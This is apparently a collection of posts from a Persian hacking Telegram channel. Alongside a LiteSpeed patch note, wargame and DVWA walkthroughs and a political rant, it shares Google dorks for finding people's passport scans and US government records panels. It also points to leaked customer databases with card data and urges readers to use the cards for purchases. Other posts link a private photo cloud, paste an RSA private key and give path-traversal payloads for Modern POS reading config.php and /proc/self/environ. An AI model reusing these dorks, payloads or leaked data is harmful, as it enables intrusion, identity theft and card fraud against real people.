#LiteSpeed #Patch #HEADER #Method
اموزش پچ باگ HEADER برای جلوگیری از سیمیلینک :::
Fix HEADER bug on the litespeed Server's :::
—————
برای این کار اول وارد سرور خود شوید و فایل (default.php) را با یکی از ویرایشگر متن لینوکس باز کنید ما اینجا از nano استفاده میکنیم :

nano /usr/local/lsws/share/autoindex/default.php

بعد از بازکردن مسیر در خطوط 230 و 234
file_get_contents('/etc/group');
را به :
file_get_contents( "$path$n");
تغییر دهید.
بعد از این از پنل ادمین litespeed اجازه لیست کردن را خاموش کنید.
با این کار باگ کاملا بسته میشود.
برای خواندن موارد بیشتر در مورد متد file_get_contents بر روی اینجاکلیک کنید.
باتشکر از همراهی شما.
—————
@ : T.me/LearnExploit
@ : IR0Day.Today Boy's

#Hackertest ( #Hackertest_net ) #Part_4_5 (4 and 5)
————————-
قسمت چهارم و پنجم از سری اموزش های تست نفوذ در سایت Hackertest.net در کنار شما هستیم.
اگر میخواهید قسمت های قبلی رو هم مشاهده کنید روی پارت مد نظر خود کلیک کنید.
1 - Part 1
//———-
2 - Part 2
//———-
3 - Part 3
دانلود قسمت های 4 و 5 در پست بعدی...
باتشکر.
—————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#Hackertest ( #Hackertest_net ) #Part_4_5 (4 and 5)
————————-
قسمت چهارم و پنجم از سری اموزش های تست نفوذ در سایت Hackertest.net در کنار شما هستیم.
اگر میخواهید قسمت های قبلی رو هم مشاهده کنید روی پارت مد نظر خود کلیک کنید.
1 - Part 1
//———-
2 - Part 2
//———-
3 - Part 3
باتشکر.
—————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

رت ویندوزی لانا بزودی....! #uzi

#Rat #uzi

#Dork - #Find - #PassPorts
—————————
یه درک جالب ! 😄 :::

#Dork-[
intitle:”Index of /“ inurl:passport
]
با این دورک میتونید پاسپورت های افراد رو بدست بیارید البته عکسشو 😁 (در بعضی موارد حتی عکس تمام صفحات پاسپورت یک شخص رو به شما میده)
امیدوارم که ایرانی جماعت ازش درست استفاده کنه 😅❤️
——————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#Dork - #Cott_System ( Cott System) - #Local_Goverment_Document (s)
//\\//\\//\\//\\//\\//\\//\\//\\//\\

Dork = {
intext:" - 2019 Cott Systems, Inc."
}

| - > cott system :
یکی از سیستم های مدیریت دولتی مدارک محلی در ایالات امریکا میباشد.
بادورک بالا میتونید به پنل جستجوی این اطلاعات دست پیدا کنید و اطلاعات مهمی از جمله :

- دفاتر اداری
- اطلاعات شخصی
- اطلاعات املاک (مالیات، بدهی، وام و غیره)
- موتورهای جستجو داخلی
- Foothold در وب سایت های آسیب پذیر .gov

دوستان معمولا امنیت این سیستم ها به خوبی تامین نمیشود و شما میتوانید ازشون باگ های سطح بالا بیرون بکشید.
باتشکر.
//\\//\\//\\//\\//\\//\\//\\//\\//\\
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#DataBase - #Informations - #Users - #BankCarts
————————
اطلاعات یک مرکز خرید :::
soluagro.com.br
در این دیتابیس اطلاعاتی از قبیل :::
- User or email
- Passwd
- IP
- Card info
- contact info
and etc
کاربران رو پیدا کنید. 😶🤞🏼
از کارت بانکی کاربران میتوانید برای خرید های اینترنتی سایت های خارجی استفقاده کنید.😁
————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#DataBase - #Informations - #Users - #BankCarts
————————
اطلاعات یک مرکز خرید :::
soluagro.com.br
در این دیتابیس اطلاعاتی از قبیل :::
- User or email
- Passwd
- IP
- Card info
- contact info
and etc
کاربران رو پیدا کنید. 😶🤞🏼
از کارت بانکی کاربران میتوانید برای خرید های اینترنتی سایت های خارجی استفقاده کنید.😁
————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#OwnCloud
=====================
کلود شخصی 😐👇🏻

http://mojoblak.srce.hr/public.php?service=gallery&t=dfe03374128a186ec837884e47b6c056

انصافا عکسای خوبی دارن 😂
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#Database - #Site - #Config
————————————-
دیتابیس و کل کانفیگ های سایت :::
lider.com.pe
پسرود به صورت هش شدس کرک کنید...
————————————-
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#Database - #Site - #Config
————————————-
دیتابیس و کل کانفیگ های سایت :::
lider.com.pe
پسورد به صورت هش شدس کرک کنید...
————————————-
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#Hackertest ( #Hackertest_net ) #Part_6 (6)
——————————————-
سلام خدمت دوستان عزیز با قسمت یا جلسه ی ششم از سری اموزش های تست نفوذ در سایت HackerTest با شما هستیم.

خب دوستان همونطور که در اموزش های قبلی اشاره شد برای پیدا کردن پسورد وارد سورس پیج شوید ( بدون مشکل میتونید وارد سورس شد.)

2 - __بعده اینکه وارد سورس پیج شدید باید موارد
alert
یا
prompt
رو جستجو کنید. شاید بپرسید چرا ؟
خب باید در جواب بگم که چون ورودی پسورد با این تگ ها تعریف شده و امکان اینکه پسورد به صورت یه شرط در کنار این مقادیر تعریف شده باشه زیاد است
اما
** = > با جستجو میبینید که به نتیجه ای نمیرسید...
خب پس چاره چیست !

برای اینکه به نتیجه برسید باید دنبال کد های جاوااسکریپت باشید (چون پسورد خواسته شده به صورت تگ های جاوااسکریپتی میباشد)
خب با کمی دقت با لاین :::

`<SCRIPT SRC="psswd.js" `LANGUAGE="JavaScript" type="text/javascript"></script>

مواجه میشید
همونطور که میبینید وقتی مفسر به این قسمت میرسه برنامه نویس با استفاده از تگ :::

SRC="another location"
(این تگ مسیر فایل رو برای ما معیین میکنه)
مفسر رو به یک محل دیگه ای هدایت کرده.

اگر وارد
`passwd.js`
شویم

با کد های
<!--
var pass;
pass=prompt("Password:","");
if (pass=="hackertestz") {
window.location="included.htm";
}else
alert("Try again...");
//-->
مواجه میشیم
و طبق اموزش های گذشته میفهمیم که پسورد ::

hackertestz

میباشد.
امیدبر ان است که مفید واقع شده باشد.
========================
دانلود قسمت های قبلی :::
1 - Part 1
//———-
2 - Part 2
//———-
3 - Part 3
//———-
4 - Part 4 and 5
=========================
@ t.me/LearnExploit
@ IR0Day.Today Boy's

دوستان مرحله ی هفتم نیز شبیه اینه
اگه کسی تونست این مرحله رو رد شه
فیلم بگیره بفرسته میذاریم کانال (با اسمه خودش)
— > @irdefacer

🔞Onion Domain🔞
zogsleydmnywqlcs.onion

❌Channel: t.me/LearnExploit

-----BEGIN RSA PRIVATE KEY-----
MIICWNngAAKBgQCiToTEfuZHu2YD1rkT584gvaU/qmshzkuHabqPsijasm
tGw30hsC2DnauW30mshcLEV+KXY40plY10msdfJwz430h
mqWlo20/g7cKkylQjINVeZE33zCjAxQBCcqki82LkWtz/hDGGDgv3vVJwBwIDAQAB
AoGBAJxo9mE1uU0fNqw0XJ7mICpFF94KL46HCqVtmvw4wjn4uJ/9X6ujNxPUB1K+
mWPm5gPP0UmSPRkZQM7Xu4iks9e/YAv37RI8WxUeHzncfhD79fsd3iRimDlibr/q
+tdCtCjTNwlY4iORNHzRl4yb1Lp1ldDZ1p6oogtrTtzBpYlhAkEAz47ZI28eL2PL
MBvRkEmmxpW8WCDE5u/hGygg76IWnSt2PvPS/USR2qRnedDPDKfDq5duH6QYyS1z
Jkc82W7HUwJBAMgwAGypMoPLOiw4trNoJs50kKFpVFYHP4ezOMt68DcRYMLQ39xQ
N+YaLCmGIxwx03WU3CtFH9791NEwiRRLYf0CP32q/810edI3mc6HCVtTPKcAAglZ
zd4FX0YSBd8RRJ/ksLNs7VJrMeQvpnca9kGzUcWS6ho+QMONwSpr92uupwJAAqFG
0Cak6EBaQkx4cgDzSZEUeVpl5j9wITtEir/Ruhd7WvPdjQpswZQkcmM1wOAStB/B
iLv+wDI7gogNtPuMjQJAJHf7AV06RFBuhVcaloAmpSoe6BQeP0RNr5YybMOgM6bi
+wk8gHa56/Oj1HVO0aDSVVucDeBYBqtxHEJ6kWNu4Q==
-----END RSA PRIVATE KEY-----

#شکست #ماهواره #پیام
————-
شکست ماهواره ی پیام در پرتاب به فضا

#تاسف برای #مسئولان #علم و #صنعت
واقعا برای مسولان تاسف میخورم !!
بجای اینکه #مسئولان تو عرصه های مختلف علمی و روی نیرو های جوان سرمایه گذاری کنند میان چند روز و چند شب مردم و برای گفتن یه #مرگ_بر_امریکا ی ساده میریزن خیابونا !!
خیلی عرضه دارید در حد امریکا از مردم و از نیروی جوان کشور حمایت کنید.
اون موقع هست که اگه #مرگ_بر_امریکا هم نگیم خودبه خود این اتفاق میوفته.
باشد که درسه درستی گرفته باشید.
تا بجای پسروی ( عملیات فیلترینگ و کند کردن سرعت اینترنت) پیشروی کنیم .
امید بر ان است که مورد توجه مسئولان قرار گرفته باشد.
———————-
@LearnExploit

#Pentesting Dvwa
#Part_1 (1)
how to install #DVWA (Damn Vulnerable Web Application ) - on the #Wamp #Server
————————————
دوره ی تست نفوذ باگ ها با برنامه DVWA
جلسه ی : ۱

اموزش نصب DVWA روی ومپ سرور و معرفی ان ::::
————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#Pentesting Dvwa
#Part_1 (1)
how to install #DVWA (Damn Vulnerable Web Application ) - on the #Wamp #Server
————————————
دوره ی تست نفوذ باگ ها با برنامه DVWA
جلسه ی : ۱

اموزش نصب DVWA روی ومپ سرور و معرفی ان ::::

— دوستانی که میخوان روی Xampp سرور نصب کنن میتونن به راهتی با یه سرچ ساده اموزششو پیدا کنن (البته روش نصب روی xampp در خود راهنمای فایل قرار داده شده)
روش تو هردو یکسان هست چون تو سطح نت اموزش نصب روی wamp نبود رکورد کردم

————————————
@ t.me/LearnExploit
@ IR0Day.Today Boy's

#Arbitrary #File #Download #LFI #RFI #Modern_POS v1.3
—————————————————--
اسیب پذیری فایل دانلود در Modern POS 1.3
=================================
نحوه ی اسکپلویت کردن :::
http://localhost/[PATH]/_inc/bridges/php-local/index.php?action=download&path=[FILE]
///———————
http://localhost/[PATH]/
این قسمت دامین شما یا تارکت میباشد.

_inc/bridges/php-local/index.php?action=download&path=
با اضافه کردن این قسمت به اخر دامین به محل اسیب پذیری دسترسی پیدا میکنید.

[FILE]
در این قسمت دستورات مربوط به RFI or LFI رو وارد کنید مانند :::

_inc/bridges/php-local/index.php?action=download&path=../../../config.php

_inc/bridges/php-local/index.php?action=download&path=../../../../../../../../proc/self/environ
======================
لینک برنامه :
Program
(https://codecanyon.net/item/modern-pos-point-of-sale-with-stock-management-system/22702683)
لینک اکسپلویت ثبت شده :
Exploit
(https://www.exploit-db.com/exploits/46137)
======================
@ t.me/LearnExploit
@ IR0Day.Today Boy's (https://t.me/learnexploit)

#Hackertest ( #Hackertest_net ) #Part_7 part 7
———————————————-
با سلام و خسته نباشید خدمت دوستان.

|- جلسه ی هفتم از سری اموزش های تست نفوذ در سایت `HackerTest.Net `در خدمت شما هستیم :

مراحل و نحوه ی پیدا کردن پسورد ::
1 - وارد سورس پیج شوید در level 7

2 - با کمی دقت میبینید که نتیجه ای از کد های موجود در جاوا اسکریپت و بخش form بدست نیاوردید.
پس باید user and pass مد نظر ما در قسمتی از بکگراند باشه یا در محلی خارج از این سورس (همون قضیه ی تگ SRC در جلسه ی قبلی)!
خب بعد از مطالعه ی کد ها میبینیم که user and pass مد نظر در محل دیگری از سورس نیس !
پس احتمال اینکه در بکگراند باشه زیاد میشه.
نکته : اگر بخوایید دنبال چیزی در بکگراند باشید باید به تگ body رفته در ان قسمت جستجو کنید.
با مطالعه این تگ میفهمیم که برنامه نویس
در بخش
bg="images/included.gif"
یک عکس در بکگراند تعریف کرده !
احتمال اینکه user and pass در این عکس باشه زیاده (شرایط خاص در sqli !)
3 - برای اینکه وارد قسمتی که عکس یا همان گیف در ان قرار دارد وارد شویم کافیه بخش :
images/included.gif
گرفته و به اخر Url سایت اضافه کنیم
یعنی چیزی شبیه به زیر :
http://www.hackertest.net/images/included.gif
4 - اگر دقت کنید user and pass در قسمت سمت راست و پایین برای ما قرار داده شده.
User : phat
Pass : jerkeybar3
امید وارم که از این قسمت هم نهایت استفاده روکنید دوستان.
باتشکر ادمین کانال 0Day.Today .
———————
1 - Part 1
(https://t.me/LearnExploit/370)
//———-
2 - Part 2
(https://t.me/LearnExploit/373)
//———-
3 - Part 3
(https://t.me/LearnExploit/380)
//———-
4 - Part 4
(https://t.me/LearnExploit/513)
// ———-
5 - Part 6
(https://t.me/LearnExploit/524)
——————————————
linux@0day:~#./@LearnExploit
IR0Day.Today Boy's